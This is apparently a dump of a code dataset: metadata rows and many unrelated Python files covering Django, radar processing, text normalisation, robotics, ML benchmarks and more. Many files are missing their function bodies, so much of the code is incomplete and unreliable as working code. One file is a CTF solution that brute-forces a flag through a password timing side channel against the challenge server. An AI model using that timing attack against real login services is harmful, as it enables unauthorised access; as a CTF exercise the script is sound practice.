hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0cc52afa5bda9e011a3f67aa407ce29b267af421 | 1,409 | py | Python | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed May 27 18:48:24 2020
@author: Christopher Cheng
"""
circles = Stack()
one_circle = Circle()
one_circle.change_radius(1)
circles.add_one(one_circle)
two_circle = Circle()
two_circle.change_radius(2)
circles.add_one(two_circle)
print(circles) | 26.092593 | 71 | 0.581973 |
0cc6417c3e829823797e9f3e6ad674ead279d5e9 | 2,657 | py | Python | src/data_analysis_util.py | vikramnayyar/Customer-Identification-for-Bank-Marketing | 4727f6d8997d26836ad167616a8edb4898623c39 | [
"Apache-2.0"
] | null | null | null | src/data_analysis_util.py | vikramnayyar/Customer-Identification-for-Bank-Marketing | 4727f6d8997d26836ad167616a8edb4898623c39 | [
"Apache-2.0"
] | null | null | null | src/data_analysis_util.py | vikramnayyar/Customer-Identification-for-Bank-Marketing | 4727f6d8997d26836ad167616a8edb4898623c39 | [
"Apache-2.0"
] | null | null | null | """
The script declares functions used in 'data_analysis.py'
"""
import os
import yaml
from logzero import logger
import matplotlib.pyplot as plt
import seaborn as sns
from matplotlib.patches import Patch
import plotly.graph_objects as go
from utility import parse_config
config_path = "config/config.yaml"
config = parse_config(config_path) # read config file
| 34.064103 | 125 | 0.657132 |
0cc6f68c50e68c364cd5514c50d107da2d606391 | 122 | py | Python | api/crawller/admin.py | MahsaSeifikar/tweetphus | 01b687f38365023cfaaa34739c50b0da79f0b510 | [
"MIT"
] | null | null | null | api/crawller/admin.py | MahsaSeifikar/tweetphus | 01b687f38365023cfaaa34739c50b0da79f0b510 | [
"MIT"
] | 1 | 2021-12-26T16:35:36.000Z | 2021-12-29T15:07:01.000Z | api/crawller/admin.py | MahsaSeifikar/tweetphus | 01b687f38365023cfaaa34739c50b0da79f0b510 | [
"MIT"
] | null | null | null | from django.contrib import admin
from crawller.models import User
# Register your models here.
admin.site.register(User) | 20.333333 | 32 | 0.811475 |
0cc75fc2057f1d904d4d63b853c8dc9ff11fc8ab | 987 | py | Python | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | """Configuration is a base class that has default values that you can change
during the instance of the client class"""
from typing import Callable
BASE_URL = "https://config.feature-flags.uat.harness.io/api/1.0"
MINUTE = 60
PULL_INTERVAL = 1 * MINUTE
default_config = Config()
| 25.973684 | 76 | 0.64843 |
0cc7dbac1b53714dc8579ed543f77deb34610c57 | 1,705 | py | Python | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | null | null | null | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | 51 | 2018-01-24T05:53:15.000Z | 2022-01-13T00:44:24.000Z | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | 3 | 2020-04-22T03:21:37.000Z | 2020-12-15T22:45:52.000Z | from django.core.management.base import BaseCommand
from users.models import Major, Minor, Course
from django.db import IntegrityError
from os import path
import json
| 32.788462 | 85 | 0.567742 |
0cc8db72c131873f18e22e999afa4a7e2c43c233 | 2,041 | py | Python | contrib/stack/stripmapStack/unpackFrame_risat_raw.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | contrib/stack/stripmapStack/unpackFrame_risat_raw.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | contrib/stack/stripmapStack/unpackFrame_risat_raw.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | #!/usr/bin/env python3
import isce
from isceobj.Sensor import createSensor
import shelve
import argparse
import os
from isceobj.Util import Poly1D
from isceobj.Planet.AstronomicalHandbook import Const
from mroipac.dopiq.DopIQ import DopIQ
import copy
def cmdLineParse():
'''
Command line parser.
'''
parser = argparse.ArgumentParser(description='Unpack RISAT raw data and store metadata in pickle file.')
parser.add_argument('-i','--input', dest='indir', type=str,
required=True, help='Input CSK frame')
parser.add_argument('-o', '--output', dest='slc', type=str,
required=True, help='Output SLC file')
parser.add_argument('-p', '--polar', dest='polar', type=str,
default='RH', help='Polarization to extract')
return parser.parse_args()
def unpack(hdf5, slcname, polar='RH'):
'''
Unpack HDF5 to binary SLC file.
'''
obj = createSensor('RISAT1')
obj._imageFile = os.path.join(hdf5, 'scene_'+polar, 'dat_01.001')
obj._leaderFile = os.path.join(hdf5, 'scene_'+polar,'lea_01.001')
if not os.path.isdir(slcname):
os.mkdir(slcname)
date = os.path.basename(slcname)
obj.output = os.path.join(slcname, date + '.raw')
obj.extractImage()
obj.frame.getImage().renderHdr()
#####Estimate doppler
dop = DopIQ()
dop.configure()
img = copy.deepcopy(obj.frame.getImage())
img.setAccessMode('READ')
dop.wireInputPort('frame', object=obj.frame)
dop.wireInputPort('instrument', object=obj.frame.instrument)
dop.wireInputPort('image', object=img)
dop.calculateDoppler()
dop.fitDoppler()
fit = dop.quadratic
coef = [fit['a'], fit['b'], fit['c']]
print(coef)
obj.frame._dopplerVsPixel = [x*obj.frame.PRF for x in coef]
pickName = os.path.join(slcname, 'raw')
with shelve.open(pickName) as db:
db['frame'] = obj.frame
if __name__ == '__main__':
'''
Main driver.
'''
inps = cmdLineParse()
unpack(inps.indir, inps.slc, polar=inps.polar)
| 26.506494 | 108 | 0.652621 |
0cc92881b3783140afbb04ec688ee09d279aa156 | 2,794 | py | Python | distla/distla_core/distla_core/linalg/qr/test_qr_ooc.py | google/distla_core | 7f0d8ab7b847a75e0fc713627488643a8984712a | [
"Apache-2.0"
] | 2 | 2021-12-19T21:17:06.000Z | 2021-12-25T09:19:47.000Z | distla/distla_core/distla_core/linalg/qr/test_qr_ooc.py | google/distla_core | 7f0d8ab7b847a75e0fc713627488643a8984712a | [
"Apache-2.0"
] | null | null | null | distla/distla_core/distla_core/linalg/qr/test_qr_ooc.py | google/distla_core | 7f0d8ab7b847a75e0fc713627488643a8984712a | [
"Apache-2.0"
] | 1 | 2021-12-25T09:19:56.000Z | 2021-12-25T09:19:56.000Z | """Tests for qr.py."""
from jax import lax
import jax.numpy as jnp
import numpy as np
import pytest
import tempfile
from distla_core.linalg.utils import testutils
from distla_core.linalg.qr import qr_ooc
from distla_core.utils import pops
DTYPE = jnp.float32
seeds = [0, 1]
flags = [True, False]
def _dephase_qr(R, Q=None):
""" Maps the Q and R factor from an arbitrary QR decomposition to the unique
with non-negative diagonal entries.
"""
phases_data = np.sign(np.diagonal(R))
m, n = R.shape
if m > n:
phases = np.ones(m)
phases[:n] = phases_data
else:
phases = phases_data
R = phases.conj()[:, None] * R
if Q is not None:
Q = Q * phases
return Q, R
| 30.703297 | 78 | 0.700787 |
0cca1b15bf096080117912090cc7cfaa4cb29eca | 7,940 | py | Python | modules/preprocessing/text/NeMo/nemo_text_processing/text_normalization/ar/taggers/cardinal.py | serkhanekarim/AI | 0a13880ae8e608cd00fa819dc590097abdb7ae6e | [
"Apache-2.0"
] | null | null | null | modules/preprocessing/text/NeMo/nemo_text_processing/text_normalization/ar/taggers/cardinal.py | serkhanekarim/AI | 0a13880ae8e608cd00fa819dc590097abdb7ae6e | [
"Apache-2.0"
] | null | null | null | modules/preprocessing/text/NeMo/nemo_text_processing/text_normalization/ar/taggers/cardinal.py | serkhanekarim/AI | 0a13880ae8e608cd00fa819dc590097abdb7ae6e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
# Copyright 2015 and onwards Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nemo_text_processing.text_normalization.ar.graph_utils import (
NEMO_ALPHA,
NEMO_DIGIT,
NEMO_NOT_SPACE,
NEMO_SIGMA,
GraphFst,
insert_space,
)
from nemo_text_processing.text_normalization.ar.taggers.date import get_hundreds_graph
from nemo_text_processing.text_normalization.ar.utils import get_abs_path
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
| 43.387978 | 118 | 0.639924 |
0cca7a33169b15c0dca26a3d1d4121500e7fe51e | 7,735 | py | Python | robot.py | dragonrobotics/2018-PowerUp | 0fb6be22420b1488ca3d6abb04588e8564d768b9 | [
"MIT"
] | 2 | 2018-02-08T23:29:21.000Z | 2018-12-27T22:45:12.000Z | robot.py | dragonrobotics/2018-PowerUp | 0fb6be22420b1488ca3d6abb04588e8564d768b9 | [
"MIT"
] | 2 | 2018-02-10T20:25:16.000Z | 2018-02-20T12:47:33.000Z | robot.py | dragonrobotics/2018-PowerUp | 0fb6be22420b1488ca3d6abb04588e8564d768b9 | [
"MIT"
] | 8 | 2018-01-15T14:53:52.000Z | 2018-02-14T22:34:30.000Z | import wpilib
import constants
import swerve
import lift
import winch
import sys
from teleop import Teleop
from autonomous.baseline_simple import Autonomous
from sensors.imu import IMU
if __name__ == "__main__":
wpilib.run(Robot)
| 31.315789 | 95 | 0.576083 |
0ccb7361200b302e98746fb913273e875a9c713b | 593 | py | Python | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 25 | 2019-03-06T11:55:56.000Z | 2021-05-21T22:07:14.000Z | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 1 | 2020-06-25T07:27:15.000Z | 2020-06-25T07:27:15.000Z | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 1 | 2019-02-14T00:42:28.000Z | 2019-02-14T00:42:28.000Z | import requests
text = "0123456789abcdefghijklmnopqrstuvwxyz_}"
flag = "hsctf{"
for _ in range(30):
time = [0.1 for _ in range(38)]
for _ in range(5):
for i in range(38):
payload = {"password": flag + text[i]}
r = requests.post(
"https://networked-password.web.chal.hsctf.com", data=payload
)
response_time = r.elapsed.total_seconds()
time[i] += response_time
print(payload, " response time : ", response_time)
flag += text[time.index(max(time))]
print("flag is ", flag)
| 21.962963 | 77 | 0.563238 |
0ccc1f35f3830db92996f5a342365046d1d2adc7 | 47,367 | py | Python | gda-public/multidim/covertree.py | drkostas/tda_examples | 3fdef4f890ced14b8e3207bd9393eaf262dd0c24 | [
"MIT"
] | 1 | 2021-12-22T14:29:40.000Z | 2021-12-22T14:29:40.000Z | gda-public/multidim/covertree.py | drkostas/tda_examples | 3fdef4f890ced14b8e3207bd9393eaf262dd0c24 | [
"MIT"
] | null | null | null | gda-public/multidim/covertree.py | drkostas/tda_examples | 3fdef4f890ced14b8e3207bd9393eaf262dd0c24 | [
"MIT"
] | null | null | null | r"""This module contains the essential classes for the "Cover-tree with
friends" algorithm, namely:
- :class:`CoverTree`
- :class:`CoverLevel`
This module also defines the constants
- :code:`ratio_Ag` :math:`=\sqrt{2} - 1=0.414\ldots`, the inverse of the silver ratio
- :code:`ratio_Au` :math:`=\frac{\sqrt{5} - 1}{2}=0.618\ldots`, the inverse of the golden ratio
Copyright
---------
- This file is part of https://github.com/geomdata/gda-public/
- 2015, 2016, 2017 by Geometric Data Analytics, Inc. (http://geomdata.com)
- AGPL license. See `LICENSE` or https://github.com/geomdata/gda-public/blob/master/LICENSE
"""
from __future__ import print_function
from copy import deepcopy
import numpy as np
import pandas as pd
from . import PointCloud
from . import fast_algorithms
from scipy.spatial.distance import cdist, pdist, squareform
from collections import OrderedDict
import collections
import logging
ratio_Ag = np.float64(0.41421356237309504880168872420969807857)
ratio_Au = np.float64(0.61803398874989484820458683436563811772)
assert ratio_Ag**2 + 2*ratio_Ag == np.float64(1.0),\
"""pre-defined ratio_Ag does not match artithmetic.
Try using some form of sqrt(2) - 1, which is the positive root of x**2 + 2*x == 1."""
assert ratio_Au**2 + 1*ratio_Au == np.float64(1.0),\
"""pre-defined ratio_Au does not match artithmetic.
Try using some form of (sqrt(5) - 1)/2, which is the positive root of x**2 + x == 1."""
| 40.623499 | 164 | 0.583508 |
0ccc2e5ca0664e29a1337110f68367598882b29e | 3,936 | py | Python | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | 1 | 2019-02-06T06:52:44.000Z | 2019-02-06T06:52:44.000Z | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | null | null | null | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | 1 | 2019-12-17T17:50:43.000Z | 2019-12-17T17:50:43.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains a class representing messages that are sent or received.
"""
from azure.iot.device import constant
# TODO: Revise this class. Does all of this REALLY need to be here?
| 50.461538 | 298 | 0.649644 |
0ccd4f9fbf2b5d4dda1cc40e475be33aa9ef28bc | 320 | py | Python | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | null | null | null | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | 5 | 2019-12-29T04:58:10.000Z | 2021-03-11T04:35:15.000Z | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | null | null | null | import pandas
import requests
with open('avengers.csv', 'w') as file:
file_url = 'https://raw.githubusercontent.com/fivethirtyeight/data/master/avengers/avengers.csv'
response = requests.get(file_url)
file.write(response.text)
with open('avengers.csv', 'r') as file:
data_frame = pandas.read_csv(file)
| 29.090909 | 100 | 0.73125 |
0ccde3d4f64a774d9d8fa84b6c6fe3d0ad69c35d | 3,997 | py | Python | backup/guitemplates/custominvocationcutdurationdialog.py | calebtrahan/KujiIn_Python | 0599d36993fa1d5988a4cf3206a12fdbe63781d8 | [
"MIT"
] | null | null | null | backup/guitemplates/custominvocationcutdurationdialog.py | calebtrahan/KujiIn_Python | 0599d36993fa1d5988a4cf3206a12fdbe63781d8 | [
"MIT"
] | null | null | null | backup/guitemplates/custominvocationcutdurationdialog.py | calebtrahan/KujiIn_Python | 0599d36993fa1d5988a4cf3206a12fdbe63781d8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'custominvocationcutdurationdialog.ui'
#
# Created by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
try:
_encoding = QtGui.QApplication.UnicodeUTF8
except AttributeError:
| 60.560606 | 138 | 0.788341 |
0ccf64808d3042c572ef4543702896d84041599e | 1,393 | py | Python | benchmarks/pytorch_alexnet_inference.py | d3dave/python-macrobenchmarks | ee52cce1af120f543ce3e2f6bc99225784b59506 | [
"MIT"
] | 20 | 2020-10-20T20:55:51.000Z | 2021-11-18T16:26:49.000Z | benchmarks/pytorch_alexnet_inference.py | d3dave/python-macrobenchmarks | ee52cce1af120f543ce3e2f6bc99225784b59506 | [
"MIT"
] | 2 | 2021-11-17T18:37:27.000Z | 2022-03-22T20:26:24.000Z | benchmarks/pytorch_alexnet_inference.py | d3dave/python-macrobenchmarks | ee52cce1af120f543ce3e2f6bc99225784b59506 | [
"MIT"
] | 4 | 2020-10-30T15:09:37.000Z | 2022-02-12T00:12:12.000Z | import json
import time
import torch
import urllib
import sys
if __name__ == "__main__":
start = time.time()
model = torch.hub.load('pytorch/vision:v0.6.0', 'alexnet', pretrained=True)
# assert time.time() - start < 3, "looks like we just did the first-time download, run this benchmark again to get a clean run"
model.eval()
url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
urllib.request.urlretrieve(url, filename)
from PIL import Image
from torchvision import transforms
input_image = Image.open(filename)
preprocess = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
input_tensor = preprocess(input_image)
input_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model
n = 1000
if len(sys.argv) > 1:
n = int(sys.argv[1])
with torch.no_grad():
times = []
for i in range(n):
times.append(time.time())
if i % 10 == 0:
print(i)
output = model(input_batch)
times.append(time.time())
print((len(times) - 1) / (times[-1] - times[0]) , "/s")
if len(sys.argv) > 2:
json.dump(times, open(sys.argv[2], 'w'))
| 31.659091 | 131 | 0.613065 |
0cd1d7ce809f4555127103b9f2ebc53cd22fdca6 | 2,885 | py | Python | Curso Python Completo - Udemy/Teste/core/poo1.py | Cauenumo/Python | 6414ee2013c651e9d45cd328a381a476c6c9073b | [
"Apache-2.0"
] | null | null | null | Curso Python Completo - Udemy/Teste/core/poo1.py | Cauenumo/Python | 6414ee2013c651e9d45cd328a381a476c6c9073b | [
"Apache-2.0"
] | null | null | null | Curso Python Completo - Udemy/Teste/core/poo1.py | Cauenumo/Python | 6414ee2013c651e9d45cd328a381a476c6c9073b | [
"Apache-2.0"
] | null | null | null | # class Circle(object):
# pi = 3.14
# # O crculo instanciado com um raio (o padro 1)
# def __init__(self, radius=1):
# self.radius = radius
# # Mtodo de clculo da rea. Observe o uso de si mesmo.
# def area(self):
# return self.radius * self.radius * Circle.pi
# # Mtodo que redefine a rea
# def setRadius(self, radius):
# self.radius = radius
# # Mtodo para obter raio (Mesmo que apenas chamar .radius)
# def getRadius(self):
# return self.radius
# c = Circle()
# c.setRadius(3)
# print('O raio : ',c.getRadius())
# print('A rea : ', c.area())
# l = [1,2,3]
# t = (1,2,3)
# print(type(t))
# def funcao(a,b):
# somei = a + b
# return somei
# print(funcao(1,2))
# print(type(funcao))
# class Dog(object):
# def __init__(self,raa):
# self.raa = raa
# sam = Dog(raa='Labrador')
# frank = Dog(raa = 'Pitbull')
# print(frank.raa)
# class Dog(object):
# species = 'mamifero'
# def __init__(self,raa):
# self.raa = raa
# print(len(self.species))
# def latir(self):
# print("au au")
# sam = Dog(raa = 'Labrador')
# print(sam.latir())
# class Circulo(object):
# pi = 3.14
# def __init__(self, raio = 1):
# self.raio = raio
# def area(self):
# return self.raio ** 2 * self.pi
# def att(self, raio):
# self.raio = raio
# def obtemraio(self):
# return self.raio
# c = Circulo()
# print(c.att(52))
# class Animal(object):
# def __init__(self):
# print('Animal criado.')
# def quemsou(self):
# print('Eu sou um animal')
# def comer(self):
# print('Comendo...')
# class Cachorro(Animal):
# def __init__(self):
# Animal.__init__(self)
# print('Cachorro criado.')
# def quemsou(self):
# print('Sou um cachorro.')
# def latir(self):
# print('Au AU')
# sam = Cachorro()
# print(sam.quemsou())
# print(sam.latir())
# class book():
# def __init__(self,titulo,autor,paginas):
# print('um livro foi criado.')
# self.titulo = titulo
# self.autor = autor
# self.paginas = paginas
# def __str__(self):
# return "Titulo {}".format(self.titulo)
# def __len__(self):
# return self.paginas
# def __del__(self):
# print('livro destruido')
# l = [1,2,3]
# livro1 = book ('Python', 'Cau', 100)
# class Line(object):
# def __init__(Self,coor1,coor2):
# self.coor1 = coor1
# self.coor2 = coor2
# def distance(self):
# x1,y1 = self.coor1
# x2,y2 = self.coor2
# return ( (x2-x1) ** 2 + (y2-y1) ** 2) ** 0.5
# def slope(self):
# x1,y1 = self.coor1
# x2,y2 = self.coo2
# return float((y2-y1))/(x2-x1)
# coor
| 20.316901 | 64 | 0.533449 |
0cd346f1de289a9e93d3b25b5635b78a4192c096 | 1,126 | py | Python | gen-raw-logs.py | lightoyou/grapl | 77488059891091e5656254ee15efef038a1b46a7 | [
"Apache-2.0"
] | null | null | null | gen-raw-logs.py | lightoyou/grapl | 77488059891091e5656254ee15efef038a1b46a7 | [
"Apache-2.0"
] | null | null | null | gen-raw-logs.py | lightoyou/grapl | 77488059891091e5656254ee15efef038a1b46a7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
try:
from typing import Any, Dict, Union, Optional
except:
pass
import time
import string
import boto3
import random
import zstd
import sys
if __name__ == '__main__':
if len(sys.argv) != 2:
raise Exception("Provide bucket prefix as first argument")
else:
main(sys.argv[1])
| 22.078431 | 72 | 0.571936 |
0cd35d400b8ba8d38cccab4e5289309cd18ed0ce | 2,773 | py | Python | src/bot/lib/economy/economy.py | rdunc/rybot | ec3bf6159e095b53e69f6f81af9f10739c180b42 | [
"MIT"
] | 1 | 2016-01-11T02:10:05.000Z | 2016-01-11T02:10:05.000Z | src/bot/lib/economy/economy.py | rdunc/RyBot | ec3bf6159e095b53e69f6f81af9f10739c180b42 | [
"MIT"
] | null | null | null | src/bot/lib/economy/economy.py | rdunc/RyBot | ec3bf6159e095b53e69f6f81af9f10739c180b42 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests, json, threading, sys
import collections, os, time
from bot.lib.economy import EconomyInit
from bot.lib.core.benchmark import Benchmark
from bot.lib.core.log import Log
from bot.helpers.color_helper import ColorHelper
from bot.helpers.rybot_helper import RyBotHelper
from collections import Counter
| 39.056338 | 141 | 0.582402 |
0cd7b71bf7de36ad8722f58dc56d94db5fb81535 | 827 | py | Python | python/mapper.py | qoofyk/zipper | c1d77448f8d479f9ef4bf785d49cf2b41da09130 | [
"BSD-3-Clause"
] | null | null | null | python/mapper.py | qoofyk/zipper | c1d77448f8d479f9ef4bf785d49cf2b41da09130 | [
"BSD-3-Clause"
] | null | null | null | python/mapper.py | qoofyk/zipper | c1d77448f8d479f9ef4bf785d49cf2b41da09130 | [
"BSD-3-Clause"
] | null | null | null | import sys
import math
# run like python 3 mapper.py 3 ip1 ip2 ip3 ip4...
if __name__ == "__main__":
#print("Running: ", sys.argv)
#print("Number of arguments: ", len(sys.argv))
mpi_size = int(sys.argv[1])
endpoint_list = sys.argv[2:]
#print("The endpoints are: " , endpoint_list)
generate_endpoint_file(endpoint_list, mpi_size, contiguous_mapper)
| 35.956522 | 79 | 0.71705 |
0cd87ef313939da59162ef6b202deb04d9ca957b | 7,079 | py | Python | src/deepcover.py | nce11/deepcover | 129488e3593f8d69e352be1e613f44480e4033e6 | [
"BSD-3-Clause"
] | 25 | 2018-03-14T21:23:00.000Z | 2021-11-22T14:06:20.000Z | src/deepcover.py | nce11/deepcover | 129488e3593f8d69e352be1e613f44480e4033e6 | [
"BSD-3-Clause"
] | 1 | 2022-03-13T07:15:15.000Z | 2022-03-14T10:29:50.000Z | src/deepcover.py | nce11/deepcover | 129488e3593f8d69e352be1e613f44480e4033e6 | [
"BSD-3-Clause"
] | 18 | 2018-03-14T19:20:45.000Z | 2022-02-16T18:33:10.000Z |
from keras.preprocessing import image
from keras.applications import vgg16
from keras.applications.vgg16 import VGG16
from keras.applications import inception_v3, mobilenet, xception
from keras.models import load_model
import matplotlib.pyplot as plt
import csv
import argparse
import os
import numpy as np
from utils import *
from to_explain import *
from comp_explain import *
if __name__=="__main__":
main()
| 44.24375 | 114 | 0.676508 |
0cdb931bc3d4d0011e0c24642dc040bbe2b51af1 | 8,924 | py | Python | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 31 | 2019-03-06T14:33:37.000Z | 2022-03-08T07:16:07.000Z | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 27 | 2019-05-17T05:06:58.000Z | 2022-03-27T00:38:56.000Z | phigaro/cli/batch.py | bobeobibo/phigaro | 342a3454bb5324426b25feb4a4d1f640b58bf8f8 | [
"MIT"
] | 12 | 2017-08-23T12:48:38.000Z | 2021-06-24T00:57:22.000Z | from __future__ import absolute_import
import argparse
import logging
import multiprocessing
import os
import sys
import uuid
from os.path import join, exists
import yaml
from phigaro.context import Context
from phigaro.batch.runner import run_tasks_chain
from phigaro.batch.task.path import sample_name
from phigaro.batch.task.prodigal import ProdigalTask
from phigaro.batch.task.hmmer import HmmerTask
from phigaro.batch.task.dummy import DummyTask
from phigaro.batch.task.preprocess import PreprocessTask
from phigaro.batch.task.run_phigaro import RunPhigaroTask
from phigaro._version import __version__
if __name__ == '__main__':
main()
| 33.174721 | 296 | 0.61766 |
0cdb9744480da6f8e1b4899b7fcf04b7238e340b | 1,551 | py | Python | MachineLearning.BayesianNetwork/python-imp/bayes_core.py | JillyMan/decision-tree | 8e2efc914aaade9cc97a2c94052bc909e50fdb48 | [
"MIT"
] | null | null | null | MachineLearning.BayesianNetwork/python-imp/bayes_core.py | JillyMan/decision-tree | 8e2efc914aaade9cc97a2c94052bc909e50fdb48 | [
"MIT"
] | 1 | 2019-12-29T13:49:52.000Z | 2019-12-29T13:49:52.000Z | MachineLearning.BayesianNetwork/python-imp/bayes_core.py | JillyMan/MachineLerningFramework | 8e2efc914aaade9cc97a2c94052bc909e50fdb48 | [
"MIT"
] | null | null | null | import math
RangeType = 'Range'
BinaryType = 'Binary'
def phe_func(p, pp, pm):
return (p * pp) / (p * pp + (1-p) * pm)
def calc_probs(pp, pm, p):
phe = phe_func(p, pp, pm)
phne = phe_func(p, 1 - pp, 1 - pm)
return (phe, phne)
def lerp(start, end, t):
return start + (end - start) * t
def interpolate_result_clamp01(phne, ph, phe, r):
if r > 0.5:
return lerp(ph, phe, r)
elif r < 0.5:
return lerp(phne, ph, r)
return ph
def interpolate_result_binary(phne, phe, r):
return phne if r == 0 else phe
| 23.149254 | 54 | 0.588008 |
0cdc773a241a8d2d5331293406b95caeb6731f44 | 926 | py | Python | tests/test_load_bin_log.py | bols-blue-org/pid_evaluation | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | 1 | 2020-08-27T06:30:53.000Z | 2020-08-27T06:30:53.000Z | tests/test_load_bin_log.py | bols-blue-org/ape | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | null | null | null | tests/test_load_bin_log.py | bols-blue-org/ape | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | null | null | null | import unittest
from ape.load_bin_log import LoadBinLog
if __name__ == '__main__':
unittest.main()
| 31.931034 | 92 | 0.637149 |
0cdcd31b1d541c0b2fc7fa87f9fe6a1fb877291b | 4,997 | py | Python | rdsslib/kinesis/client.py | JiscSD/rdss-shared-libraries | cf07cad3f176ef8be1410fc29b240fb4791e607a | [
"Apache-2.0"
] | null | null | null | rdsslib/kinesis/client.py | JiscSD/rdss-shared-libraries | cf07cad3f176ef8be1410fc29b240fb4791e607a | [
